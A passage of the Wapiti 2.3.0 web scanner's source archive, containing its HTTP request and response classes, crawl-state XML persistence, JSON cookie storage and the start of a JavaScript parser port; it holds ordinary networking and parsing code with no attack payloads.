self._file_params]) self._cached_hash = hash((self._method, self._resource_path, get_kv, post_kv, file_kv)) return self._cached_hash def __eq__(self, other): if not isinstance(other, HTTPResource): return NotImplemented if self._method != other._method: return False if self._resource_path != other._resource_path: return False return hash(self) == hash(other) def __lt__(self, other): if not isinstance(other, HTTPResource): return NotImplemented if self.url < other.url: return True else: if self.url == other.url: return self.encoded_data < other.encoded_data return False def __le__(self, other): if not isinstance(other, HTTPResource): return NotImplemented if self.url < other.url: return True elif self.url == other.url: return self.encoded_data <= other.encoded_data return False def __ne__(self, other): if not isinstance(other, HTTPResource): return NotImplemented if self.method != other.method: return True if self._resource_path != other._resource_path: return True return hash(self) != hash(other) def __gt__(self, other): if not isinstance(other, HTTPResource): return NotImplemented if self.url > other.url: return True elif self.url == other.url: return self.encoded_data > other.encoded_data return False def __ge__(self, other): if not isinstance(other, HTTPResource): return NotImplemented if self.url > other.url: return True elif self.url == other.url: return self.encoded_data >= other.encoded_data return False def _encoded_keys(self, params): quoted_keys = [] for k, __ in params: quoted_keys.append(urllib.quote(k, safe='%')) return "&".join(quoted_keys) def __repr__(self): buff = "" if self._get_params: buff = "%s %s" % (self._method, self.url) else: buff = "%s %s" % (self._method, self._resource_path) if self._post_params: buff += "\n\tdata = %s" % (self.encoded_data) if self._file_params: buff += "\n\tfiles = %s" % (self.encoded_files) return buff @property def http_repr(self): rel_url = self.url.split('/', 3)[3] http_string = "%s /%s HTTP/1.1\nHost: %s\n" % (self._method, rel_url, self._hostname) if self._referer: http_string += "Referer: %s\n" % (self._referer) if self._file_params: boundary = "------------------------boundarystring" http_string += "Content-Type: multipart/form-data; boundary=%s\n\n" % (boundary) for field_name, field_value in self._post_params: http_string += ("{0}\nContent-Disposition: form-data; " "name=\"{1}\"\n\n{2}\n").format(boundary, field_name, field_value) for field_name, field_value in self._file_params: http_string += ("{0}\nContent-Disposition: form-data; name=\"{1}\"; filename=\"{2}\"\n\n" "/* snip file content snip */\n").format(boundary, field_name, field_value[0]) http_string += "{0}--\n".format(boundary) elif self._post_params: http_string += "Content-Type: application/x-www-form-urlencoded\n" http_string += "\n%s" % (self.encoded_data) return http_string @property def curl_repr(self): curl_string = "curl \"{0}\"".format(shell_escape(self.url)) if self._referer: curl_string += " -e \"{0}\"".format(shell_escape(self._referer)) if self._file_params: for field_name, field_value in self._post_params: curl_string += " -F \"{0}\"".format(shell_escape("{0}={1}".format(field_name, field_value))) for field_name, field_value in self._file_params: curl_upload_kv = "{0}=@your_local_file;filename={1}".format(field_name, field_value[0]) curl_string += " -F \"{0}\"".format(shell_escape(curl_upload_kv)) pass elif self._post_params: curl_string += " -d \"{0}\"".format(shell_escape(self.encoded_data)) return curl_string def setHeaders(self, response_headers): """Set the HTTP headers received while requesting the resource""" self._headers = response_headers def setStartTime(self): self._start_time = datetime.datetime.utcnow() def setElapsedTime(self): """Store the time taken for obtaining a responde to the request.""" self._elapsed_time = datetime.datetime.utcnow() - self._start_time @property def start_time(self): return self._start_time @property def elapsed_time(self): return self._elapsed_time @property def url(self): if self._cached_url is None: if self._get_params: self._cached_url = "{0}?{1}".format(self._resource_path, self._encode_params(self._get_params)) else: self._cached_url = self._resource_path return self._cached_url @property def hostname(self): return self._hostname @property def port(self): return self._port @property def path(self): return self._resource_path @property def file_path(self): return self._file_path @property def file_ext(self): return os.path.splitext(self.file_path)[1] @property def file_name(self): return os.path.basename(self.file_path) @property def method(self): return self._method @property def encoding(self): return self._encoding @property def headers(self): return self._headers @property def referer(self): return self._referer # To prevent errors, always return a deepcopy of the internal lists @property def get_params(self): return deepcopy(self._get_params) @property def post_params(self): return deepcopy(self._post_params) @property def file_params(self): return deepcopy(self._file_params) def _encode_params(self, params): if not params: return "" key_values = [] for k, v in params: k = urllib.quote(k, safe='%') if v is None: key_values.append(k) else: if isinstance(v, tuple) or isinstance(v, list): # for upload fields v = v[0] v = urllib.quote(v, safe='%') key_values.append("%s=%s" % (k, v)) return "&".join(key_values) @property def encoded_params(self): return self._encode_params(self._get_params) @property def encoded_data(self): """Return a raw string of key/value parameters for POST requests""" return self._encode_params(self._post_params) @property def encoded_files(self): return self._encode_params(self._file_params) @property def encoded_get_keys(self): if self._cached_get_keys is None: self._cached_get_keys = self._encoded_keys(self._get_params) return self._cached_get_keys @property def encoded_post_keys(self): if self._cached_post_keys is None: self._cached_post_keys = self._encoded_keys(self._post_params) return self._cached_post_keys @property def encoded_file_keys(self): if self._cached_file_keys is None: self._cached_file_keys = self._encoded_keys(self._file_params) return self._cached_file_keys class HTTPResponse(object): resp = None def __init__(self, requests_resp, peer, timestamp): self.resp = requests_resp self.peer = peer self.timestamp = timestamp def getPage(self): "Return the content of the page in unicode." if self.resp.encoding: return self.resp.text else: return self.resp.content def getRawPage(self): "Return the content of the page in raw bytes." return self.resp.content def getCode(self): "Return the HTTP Response code ." return str(self.resp.status_code) def getHeaders(self): "Return the HTTP headers of the Response." return self.resp.headers def getPageCode(self): "Return a tuple of the content and the HTTP Response code." return (self.getPage(), self.getCode()) def getEncoding(self): "Return the detected encoding for the page." return self.resp.encoding def setEncoding(self, new_encoding): "Change the encoding (for getPage())" self.resp.encoding = new_encoding def getPeer(self): """Return the network address of the server that delivered this Response. This will always be a socket_object.getpeername() return value, which is normally a (ip_address, port) tuple.""" return self.peer def getTimestamp(self): """Return a datetime.datetime object describing when this response was received.""" return self.timestamp class HTTP(object): proxies = {} auth_credentials = [] auth_method = "basic" timeout = 6.0 h = None cookiejar = {} server = "" verify_ssl = True configured = 0 def __init__(self, server): self.h = requests.Session() for adapter_protocol in self.h.adapters: self.h.adapters[adapter_protocol].max_retries = 1 self.server = server def send(self, target, method="", get_params=None, post_params=None, file_params=None, headers={}): "Send a HTTP Request. GET or POST (if post_params is set)." resp = None _headers = {} _headers.update(headers) get_data = None if isinstance(get_params, basestring): get_data = get_params elif isinstance(get_params, list): get_data = self.encode(get_params) post_data = None if isinstance(post_params, basestring): post_data = post_params elif isinstance(post_params, list): post_data = self.encode(post_params) file_data = None if isinstance(file_params, tuple) or isinstance(file_params, list): file_data = file_params if isinstance(target, HTTPResource): if get_data is None: get_data = target.get_params target.setStartTime() if target.method == "GET": resp = self.h.get(target.url, headers=_headers, timeout=self.timeout, allow_redirects=False, verify=self.verify_ssl) else: if target.referer: _headers.update({'referer': target.referer}) if post_data is None: post_data = target.post_params if file_data is None: file_data = target.file_params if target.method == "POST": if not file_data: _headers.update({'content-type': 'application/x-www-form-urlencoded'}) resp = self.h.post(target.path, params=get_data, data=post_data, files=file_data, headers=_headers, timeout=self.timeout, allow_redirects=False, verify=self.verify_ssl) else: resp = self.h.request(target.method, target.path, params=get_data, data=post_data, files=file_data, headers=_headers, timeout=self.timeout, allow_redirects=False, verify=self.verify_ssl) target.setElapsedTime() target.setHeaders(resp.headers) if resp is None: return None return HTTPResponse(resp, "", datetime.datetime.now()) def quote(self, url): "Encode a string with hex representation (%XX) for special characters." return urllib.quote(url) def encode(self, params_list): "Encode a sequence of two-element lists or dictionary into a URL query string." encoded_params = [] for k, v in params_list: # not safe: '&=#' with of course quotes... k = urllib.quote(k, safe='/%[]:;$()+,!?*') v = urllib.quote(v, safe='/%[]:;$()+,!?*') encoded_params.append("%s=%s" % (k, v)) return "&".join(encoded_params) def uqe(self, params_list): # , encoding = None): "urlencode a string then interpret the hex characters (%41 will give 'A')." return urllib.unquote(self.encode(params_list)) # , encoding)) def escape(self, url): "Change special characters in their html entities representation." return cgi.escape(url, quote=True).replace("'", "%27") def setTimeOut(self, timeout=6.0): "Set the time to wait for a response from the server." self.timeout = timeout socket.setdefaulttimeout(self.timeout) def getTimeOut(self): "Return the timeout used for HTTP requests." return self.timeout def setVerifySsl(self, verify=True): "Set whether SSL must be verified." self.verify_ssl = verify def setProxy(self, proxy=""): "Set a proxy to use for HTTP requests." url_parts = urlparse.urlparse(proxy) protocol = url_parts.scheme host = url_parts.netloc if protocol in ["http", "https"]: if host: self.proxies[protocol] = "%s://%s/" % (protocol, host) self.h.proxies = self.proxies def setCookieFile(self, cookie): "Load session data from a cookie file" if os.path.isfile(cookie): jc = jsoncookie.jsoncookie() jc.open(cookie) self.cookiejar = jc.cookiejar(self.server) self.h.cookies = self.cookiejar jc.close() def setAuthCredentials(self, auth_credentials): "Set credentials to use if the website require an authentication." self.auth_credentials = auth_credentials # Force reload self.setAuthMethod(self.auth_method) def setAuthMethod(self, auth_method): "Set the authentication method to use for the requests." self.auth_method = auth_method if len(self.auth_credentials) == 2: username, password = self.auth_credentials if self.auth_method == "basic": from requests.auth import HTTPBasicAuth self.h.auth = HTTPBasicAuth(username, password) elif self.auth_method == "digest": from requests.auth import HTTPDigestAuth self.h.auth = HTTPDigestAuth(username, password) elif self.auth_method == "ntlm": from requests_ntlm import HttpNtlmAuth self.h.auth = HttpNtlmAuth(username, password) elif self.auth_method == "kerberos": from requests_kerberos import HTTPKerberosAuth self.h.auth = HTTPKerberosAuth() if __name__ == "__main__": res1 = HTTPResource("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res2 = HTTPResource("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']]) res3 = HTTPResource("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'z']]) res4 = HTTPResource("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res5 = HTTPResource("http://httpbin.org/post?var1=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res6 = HTTPResource("http://httpbin.org/post?var3=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res7 = HTTPResource("http://httpbin.org/post?var1=z&var2=b&var4=e", post_params=[['post1', 'c'], ['post2', 'd']]) res8 = HTTPResource("http://httpbin.org/post?var1=z&var2=d", post_params=[['post1', 'c'], ['post2', 'd']]) res10 = HTTPResource("http://httpbin.org/post?qs0", post_params=[['post1', 'c'], ['post2', 'd']]) res11 = HTTPResource("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']]) res12 = HTTPResource("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ['fname1', 'content']], ['file2', ['fname2', 'content']]]) assert res1 < res2 assert res2 > res3 assert res1 < res3 assert res1 == res4 assert res1 != res2 assert res2 >= res1 assert res1 <= res3 print "=== Basic representation follows ===" print res1 print "=== cURL representation follows ===" print res1.curl_repr print "=== HTTP representation follows ===" print res1.http_repr print "=== POST parameters as an array ===" print res1.post_params print "=== POST keys encoded as string ===" print res1.encoded_post_keys print "=== Upload HTTP representation ===" print res12.http_repr print "=== Upload basic representation ===" print res12 print "=== Upload cURL representation ===" print res12.curl_repr print wapiti-2.3.0+dfsg/wapitiCore/net/__init__.py000066400000000000000000000000001240201516300207150ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/net/crawlerpersister.py000066400000000000000000000264261240201516300226020ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2009-2013 Nicolas Surribas # # Original authors : # David del Pozo # Alberto Pastor # Copyright (C) 2008 Informatica Gesfor # ICT Romulus (http://www.ict-romulus.eu) # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import os from xml.parsers import expat from xml.dom.minidom import Document from urllib import quote, unquote from wapitiCore.net import HTTP class CrawlerPersister(object): """ This class makes the persistence tasks for persisting the crawler parameters in other to can continue the process in the future. """ CRAWLER_DATA_DIR_NAME = "scans" HOME_DIR = os.getenv('HOME') or os.getenv('USERPROFILE') BASE_DIR = os.path.join(HOME_DIR, ".wapiti") CRAWLER_DATA_DIR = os.path.join(BASE_DIR, CRAWLER_DATA_DIR_NAME) ROOT_URL = "rootURL" TO_BROWSE = "toBrowse" BROWSED = "browsed" RESOURCE = "resouce" METHOD = "method" PATH = "path" INPUT = "input" INPUT_NAME = "name" INPUT_VALUE = "value" HEADERS = "headers" HEADER = "header" HEADER_NAME = "name" HEADER_VALUE = "value" ENCODING = "encoding" REFERER = "referer" GET_PARAMS = "get_params" POST_PARAMS = "post_params" FILE_PARAMS = "file_params" # toBrowse can contain GET and POST resources toBrowse = [] # browsed contains only GET resources browsed = [] # forms contains only POST resources forms = [] uploads = [] headers = {} rootURL = "" tag = "" array = None method = "" path = "" encoding = "" referer = "" get_params = [] post_params = [] file_params = [] def __init__(self): pass def isDataForUrl(self, fileName): return os.path.exists(fileName) def saveXML(self, fileName): """ Exports the crawler parameters to an XML file. @param fileName The file where is loaded the crawler data """ xml = Document() root = xml.createElement("root") xml.appendChild(root) rootUrlEl = xml.createElement(self.ROOT_URL) rootUrlEl.appendChild(xml.createTextNode(self.rootURL.url)) root.appendChild(rootUrlEl) # 1 - URLs and FORMs not yet browsed # we don't know several informations yet like the response headers toBrowseEl = xml.createElement(self.TO_BROWSE) for http_resource in self.toBrowse: # resEl = xml.createElement(self.RESOURCE) resEl.setAttribute(self.METHOD, http_resource.method) resEl.setAttribute(self.PATH, http_resource.path) resEl.setAttribute(self.ENCODING, http_resource.encoding) # refererEl = xml.createElement(self.REFERER) refererEl.appendChild(xml.createTextNode(http_resource.referer)) resEl.appendChild(refererEl) # getParamsEl = xml.createElement(self.GET_PARAMS) for k, v in http_resource.get_params: inputEl = xml.createElement(self.INPUT) inputEl.setAttribute(self.INPUT_NAME, quote(k)) if v is not None: inputEl.setAttribute(self.INPUT_VALUE, quote(v)) getParamsEl.appendChild(inputEl) resEl.appendChild(getParamsEl) # postParamsEl = xml.createElement(self.POST_PARAMS) for k, v in http_resource.post_params: inputEl = xml.createElement(self.INPUT) inputEl.setAttribute(self.INPUT_NAME, quote(k)) inputEl.setAttribute(self.INPUT_VALUE, quote(v)) postParamsEl.appendChild(inputEl) resEl.appendChild(postParamsEl) # fileParamsEl = xml.createElement(self.FILE_PARAMS) for k, v in http_resource.file_params: inputEl = xml.createElement(self.INPUT) inputEl.setAttribute(self.INPUT_NAME, quote(k)) inputEl.setAttribute(self.INPUT_VALUE, quote(v)) fileParamsEl.appendChild(inputEl) resEl.appendChild(fileParamsEl) toBrowseEl.appendChild(resEl) root.appendChild(toBrowseEl) # 2 - URLs and FORMs already browsed browsedEl = xml.createElement(self.BROWSED) for http_resource in self.browsed: # resEl = xml.createElement(self.RESOURCE) resEl.setAttribute(self.METHOD, http_resource.method) resEl.setAttribute(self.PATH, http_resource.path) resEl.setAttribute(self.ENCODING, http_resource.encoding) # refererEl = xml.createElement(self.REFERER) refererEl.appendChild(xml.createTextNode(http_resource.referer)) resEl.appendChild(refererEl) # getParamsEl = xml.createElement(self.GET_PARAMS) for k, v in http_resource.get_params: inputEl = xml.createElement(self.INPUT) inputEl.setAttribute(self.INPUT_NAME, quote(k)) if v is not None: inputEl.setAttribute(self.INPUT_VALUE, quote(v)) getParamsEl.appendChild(inputEl) resEl.appendChild(getParamsEl) # postParamsEl = xml.createElement(self.POST_PARAMS) for k, v in http_resource.post_params: inputEl = xml.createElement(self.INPUT) inputEl.setAttribute(self.INPUT_NAME, quote(k)) inputEl.setAttribute(self.INPUT_VALUE, quote(v)) postParamsEl.appendChild(inputEl) resEl.appendChild(postParamsEl) # fileParamsEl = xml.createElement(self.FILE_PARAMS) for k, v in http_resource.file_params: inputEl = xml.createElement(self.INPUT) inputEl.setAttribute(self.INPUT_NAME, quote(k)) inputEl.setAttribute(self.INPUT_VALUE, quote(v[0])) fileParamsEl.appendChild(inputEl) resEl.appendChild(fileParamsEl) # headersEl = xml.createElement(self.HEADERS) for k, v in http_resource.headers.items(): if v is None: v = "" headEl = xml.createElement(self.HEADER) headEl.setAttribute(self.HEADER_NAME, k) headEl.setAttribute(self.HEADER_VALUE, v) headersEl.appendChild(headEl) resEl.appendChild(headersEl) browsedEl.appendChild(resEl) root.appendChild(browsedEl) f = open(fileName, "w") try: xml.writexml(f, " ", " ", "\n", "UTF-8") finally: f.close() def loadXML(self, fileName): """ Loads the crawler parameters from an XML file. @param fileName The file from where is loaded the crawler data """ self._parser = expat.ParserCreate("UTF-8") self._parser.StartElementHandler = self.__start_element self._parser.EndElementHandler = self.__end_element self._parser.CharacterDataHandler = self.__char_data self._parser.returns_unicode = False f = None try: f = open(fileName) content = f.read() self.__feed(content.replace("\n", "")) finally: if f is not None: f.close() def __feed(self, data): self._parser.Parse(data, 0) def __close(self): self._parser.Parse("", 1) del self._parser def __start_element(self, name, attrs): if name == self.TO_BROWSE: self.array = self.toBrowse elif name == self.BROWSED: self.array = self.browsed elif name == self.RESOURCE: self.method = attrs[self.METHOD] self.path = attrs[self.PATH] self.encoding = attrs[self.ENCODING] self.referer = "" self.headers = {} self.get_params = [] self.post_params = [] self.file_params = [] elif name in [self.GET_PARAMS, self.POST_PARAMS, self.FILE_PARAMS, self.REFERER, self.ROOT_URL]: self.tag = name elif name == self.HEADER: self.headers[attrs[self.HEADER_NAME]] = attrs[self.HEADER_VALUE] elif name == self.INPUT: param_name = unquote(attrs[self.INPUT_NAME]) if self.INPUT_VALUE in attrs: param_value = unquote(attrs[self.INPUT_VALUE]) else: param_value = None if self.tag == self.GET_PARAMS: self.get_params.append([param_name, param_value]) if self.tag == self.POST_PARAMS: self.post_params.append([param_name, param_value]) if self.tag == self.FILE_PARAMS: self.file_params.append([param_name, param_value]) def __end_element(self, name): if name == self.RESOURCE: http_res = HTTP.HTTPResource(self.path, method=self.method, encoding=self.encoding, referer=self.referer, get_params=self.get_params, post_params=self.post_params, file_params=self.file_params) http_res.setHeaders(self.headers) if self.array is self.toBrowse: self.toBrowse.append(http_res) else: if self.method == "GET": self.browsed.append(http_res) elif self.method == "POST": self.forms.append(http_res) def __char_data(self, data): if self.tag == self.ROOT_URL: self.rootURL = data.strip(" ") elif self.tag == self.REFERER: self.referer = data.strip(" ") def setRootURL(self, rootURL): self.rootURL = rootURL def getRootURL(self): return self.rootURL def setToBrose(self, toBrowse): self.toBrowse = toBrowse def getToBrose(self): return self.toBrowse def setBrowsed(self, browsed): self.browsed = browsed def getBrowsed(self): return self.browsed def setForms(self, forms): self.forms = forms def getForms(self): return self.forms def setUploads(self, uploads): self.uploads = uploads def getUploads(self): return self.uploads wapiti-2.3.0+dfsg/wapitiCore/net/jsoncookie.py000066400000000000000000000124071240201516300213370ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2012-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import json import cookielib import requests class jsoncookie(object): cookiedict = None fd = None # return a dictionary on success, None on failure def open(self, filename): if not filename: return None try: self.fd = open(filename, "r+") self.cookiedict = json.load(self.fd) except IOError: self.fd = open(filename, "w+") self.cookiedict = {} return self.cookiedict def addcookies(self, cookies): if not isinstance(cookies, requests.cookies.RequestsCookieJar): return False for domain, pathdict in cookies._cookies.items(): dotdomain = domain if domain[0] == '.' else '.' + domain if dotdomain not in self.cookiedict.keys(): self.cookiedict[dotdomain] = {} for path, keydict in pathdict.items(): if path not in self.cookiedict[dotdomain].keys(): self.cookiedict[dotdomain][path] = {} for key, cookieobj in keydict.items(): if isinstance(cookieobj, cookielib.Cookie): print cookieobj cookie_attrs = {} cookie_attrs["value"] = cookieobj.value cookie_attrs["expires"] = cookieobj.expires cookie_attrs["secure"] = cookieobj.secure cookie_attrs["port"] = cookieobj.port cookie_attrs["version"] = cookieobj.version self.cookiedict[dotdomain][path][key] = cookie_attrs def cookiejar(self, domain): if not domain: return None dotdomain = domain if domain[0] == '.' else '.' + domain exploded = dotdomain.split(".") parent_domains = [".%s" % (".".join(exploded[x:])) for x in range(1, len(exploded) - 1)] matching_domains = [d for d in parent_domains if d in self.cookiedict] if not matching_domains: return None cj = cookielib.CookieJar() for d in matching_domains: for path in self.cookiedict[d]: for cookie_name, cookie_attrs in self.cookiedict[d][path].items(): ck = cookielib.Cookie(version=cookie_attrs["version"], name=cookie_name, value=cookie_attrs["value"], port=None, port_specified=False, domain=d, domain_specified=True, domain_initial_dot=False, path=path, path_specified=True, secure=cookie_attrs["secure"], expires=cookie_attrs["expires"], discard=True, comment=None, comment_url=None, rest={'HttpOnly': None}, rfc2109=False) if cookie_attrs["port"]: ck.port = cookie_attrs["port"] ck.port_specified = True cj.set_cookie(ck) return cj def delete(self, domain, path=None, key=None): if not domain: return False if domain not in self.cookiedict.keys(): return False if not path: # delete whole domain data self.cookiedict.pop(domain) return True # path asked for deletion... but does not exist if path not in self.cookiedict[domain].keys(): return False if not key: # remove every data on the specified domain for the matching path self.cookiedict[domain].pop(path) return True if key in self.cookiedict[domain][path].keys(): self.cookiedict[domain][path].pop(key) return True return False def dump(self): if not self.fd: return False self.fd.seek(0) self.fd.truncate() json.dump(self.cookiedict, self.fd, indent=2) return True def close(self): self.fd.close() wapiti-2.3.0+dfsg/wapitiCore/net/jsparser/000077500000000000000000000000001240201516300204475ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/net/jsparser/__init__.py000066400000000000000000000000001240201516300225460ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/net/jsparser/jsparser.py000066400000000000000000001304001240201516300226500ustar00rootroot00000000000000#!/usr/bin/python # # This file is a modification of jsparser.py from pynarcissus ( https://code.google.com/p/pynarcissus/ ) # # ***** BEGIN LICENSE BLOCK ***** # Version: MPL 1.1/GPL 2.0/LGPL 2.1 # # The contents of this file are subject to the Mozilla Public License Version # 1.1 (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # http://www.mozilla.org/MPL/ # # Software distributed under the License is distributed on an "AS IS" basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # # The Original Code is the Narcissus JavaScript engine, written in Javascript. # # The Initial Developer of the Original Code is # Brendan Eich . # Portions created by the Initial Developer are Copyright (C) 2004 # the Initial Developer. All Rights Reserved. # # The Python version of the code was created by JT Olds , # and is a direct translation from the Javascript version. # # Alternatively, the contents of this file may be used under the terms of # either the GNU General Public License Version 2 or later (the "GPL"), or # the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), # in which case the provisions of the GPL or the LGPL are applicable instead # of those above. If you wish to allow use of your version of this file only # under the terms of either the GPL or the LGPL, and not to allow others to # use your version of this file under the terms of the MPL, indicate your # decision by deleting the provisions above and replace them with the notice # and other provisions required by the GPL or the LGPL. If you do not delete # the provisions above, a recipient may use your version of this file under # the terms of any one of the MPL, the GPL or the LGPL. # # ***** END LICENSE BLOCK ***** */ """ PyNarcissus A lexical scanner and parser. JS implemented in JS, ported to Python. """ import re import sys class Object: pass class Error_(Exception): pass class ParseError(Error_): pass GLOBALS = {} tokens = {0: 'END', 1: '\n', 2: ';', 3: ',', 4: '=', 5: '?', 6: ':', 7: 'CONDITIONAL', 8: '||', 9: '&&', 10: '|', 11: '^', 12: '&', 13: '==', 14: '!=', 15: '===', 16: '!==', 17: '<', 18: '<=', 19: '>=', 20: '>', 21: '<<', 22: '>>', 23: '>>>', 24: '+', 25: '-', 26: '*', 27: '/', 28: '%', 29: '!', 30: '~', 31: 'UNARY_PLUS', 32: 'UNARY_MINUS', 33: '++', 34: '--', 35: '.', 36: '[', 37: ']', 38: '{', 39: '}', 40: '(', 41: ')', 42: 'SCRIPT', 43: 'BLOCK', 44: 'LABEL', 45: 'FOR_IN', 46: 'CALL', 47: 'NEW_WITH_ARGS', 48: 'INDEX', 49: 'ARRAY_INIT', 50: 'OBJECT_INIT', 51: 'PROPERTY_INIT', 52: 'GETTER', 53: 'SETTER', 54: 'GROUP', 55: 'LIST', 56: 'IDENTIFIER', 57: 'NUMBER', 58: 'STRING', 59: 'REGEXP', 60: 'break', 61: 'case', 62: 'catch', 63: 'const', 64: 'continue', 65: 'debugger', 66: 'default', 67: 'delete', 68: 'do', 69: 'else', 70: 'enum', 71: 'false', 72: 'finally', 73: 'for', 74: 'function', 75: 'if', 76: 'in', 77: 'instanceof', 78: 'new', 79: 'null', 80: 'return', 81: 'switch', 82: 'this', 83: 'throw', 84: 'true', 85: 'try', 86: 'typeof', 87: 'var', 88: 'void', 89: 'while', 90: 'with'} opTypeNames = [('\n', "NEWLINE"), (';', "SEMICOLON"), (',', "COMMA"), ('?', "HOOK"), (':', "COLON"), ('||', "OR"), ('&&', "AND"), ('|', "BITWISE_OR"), ('^', "BITWISE_XOR"), ('&', "BITWISE_AND"), ('===', "STRICT_EQ"), ('==', "EQ"), ('=', "ASSIGN"), ('!==', "STRICT_NE"), ('!=', "NE"), ('<<', "LSH"), ('<=', "LE"), ('<', "LT"), ('>>>', "URSH"), ('>>', "RSH"), ('>=', "GE"), ('>', "GT"), ('++', "INCREMENT"), ('--', "DECREMENT"), ('+', "PLUS"), ('-', "MINUS"), ('*', "MUL"), ('/', "DIV"), ('%', "MOD"), ('!', "NOT"), ('~', "BITWISE_NOT"), ('.', "DOT"), ('[', "LEFT_BRACKET"), (']', "RIGHT_BRACKET"), ('{', "LEFT_CURLY"), ('}', "RIGHT_CURLY"), ('(', "LEFT_PAREN"), (')', "RIGHT_PAREN")] opTypeNames = { '>=': 'GE', '>>': 'RSH', '<<': 'LSH', '<=': 'LE', '!=': 'NE', '!': 'NOT', '%': 'MOD', '&': 'BITWISE_AND', ')': 'RIGHT_PAREN', '(': 'LEFT_PAREN', '+': 'PLUS', '*': 'MUL', '-': 'MINUS', ',': 'COMMA', '/': 'DIV', '.': 'DOT', '>>>': 'URSH', ';': 'SEMICOLON', ':': 'COLON', '=': 'ASSIGN', '||': 'OR', '?': 'HOOK', '>': 'GT', '\n': 'NEWLINE', '==': 'EQ', '&&': 'AND', '[': 'LEFT_BRACKET', ']': 'RIGHT_BRACKET', '^': 'BITWISE_XOR', '===': 'STRICT_EQ', '!==': 'STRICT_NE', '++': 'INCREMENT', '<': 'LT', '--': 'DECREMENT', '{': 'LEFT_CURLY', '}': 'RIGHT_CURLY', '|': 'BITWISE_OR', '~': 'BITWISE_NOT' } GLOBALS = {'VOID': 88, 'RIGHT_BRACKET': 37, 'UNARY_MINUS': 32, 'RIGHT_PAREN': 41, 'STRICT_EQ': 15, 'TRUE': 84, 'MINUS': 25, 'NEWLINE': 1, 'PLUS': 24, 'GT': 20, 'DEBUGGER': 65, 'ENUM': 70, 'GE': 19, 'VAR': 87, 'ARRAY_INIT': 49, 'BITWISE_XOR': 11, 'RETURN': 80, 'BITWISE_NOT': 30, 'THIS': 82, 'TYPEOF': 86, 'OR': 8, 'DELETE': 67, 'INDEX': 48, 'GROUP': 54, 'NEW_WITH_ARGS': 47, 'LABEL': 44, 'BITWISE_AND': 12, 'NEW': 78, 'BLOCK': 43, 'SETTER': 53, 'WITH': 90, 'LSH': 21, 'COLON': 6, 'UNARY_PLUS': 31, 'FUNCTION': 74, 'END': 0, 'FOR': 73, 'ELSE': 69, 'TRY': 85, 'GETTER': 52, 'REGEXP': 59, 'EQ': 13, 'DECREMENT': 34, 'AND': 9, 'CONTINUE': 64, 'NOT': 29, 'LEFT_CURLY': 38, 'RIGHT_CURLY': 39, 'DEFAULT': 66, 'STRICT_NE': 16, 'WHILE': 89, 'MUL': 26, 'DOT': 35, 'CASE': 61, 'SEMICOLON': 2, 'SCRIPT': 42, 'CONDITIONAL': 7, 'LEFT_PAREN': 40, 'NE': 14, 'SWITCH': 81, 'INCREMENT': 33, 'CATCH': 62, 'IDENTIFIER': 56, 'INSTANCEOF': 77, 'FALSE': 71, 'LIST': 55, 'BREAK': 60, 'BITWISE_OR': 10, 'LEFT_BRACKET': 36, 'DO': 68, 'CONST': 63, 'NUMBER': 57, 'HOOK': 5, 'DIV': 27, 'NULL': 79, 'LE': 18, 'URSH': 23, 'LT': 17, 'COMMA': 3, 'ASSIGN': 4, 'STRING': 58, 'FINALLY': 72, 'FOR_IN': 45, 'IN': 76, 'IF': 75, 'RSH': 22, 'PROPERTY_INIT': 51, 'CALL': 46, 'OBJECT_INIT': 50, 'MOD': 28, 'THROW': 83} tokens = {0: 'END', 1: '\n', 2: ';', 3: ',', 4: '=', 5: '?', 6: ':', 7: 'CONDITIONAL', 8: '||', 9: '&&', 10: '|', 11: '^', 12: '&', 13: '==', 14: '!=', 15: '===', 16: '!==', 17: '<', 18: '<=', 19: '>=', 20: '>', 21: '<<', 22: '>>', 23: '>>>', 24: '+', 25: '-', 26: '*', 27: '/', 28: '%', 29: '!', 30: '~', 31: 'UNARY_PLUS', 32: 'UNARY_MINUS', 33: '++', 34: '--', 35: '.', 36: '[', 37: ']', 38: '{', 39: '}', 40: '(', 41: ')', 42: 'SCRIPT', 43: 'BLOCK', 44: 'LABEL', 45: 'FOR_IN', 46: 'CALL', 47: 'NEW_WITH_ARGS', 48: 'INDEX', 49: 'ARRAY_INIT', 50: 'OBJECT_INIT', 51: 'PROPERTY_INIT', 52: 'GETTER', 53: 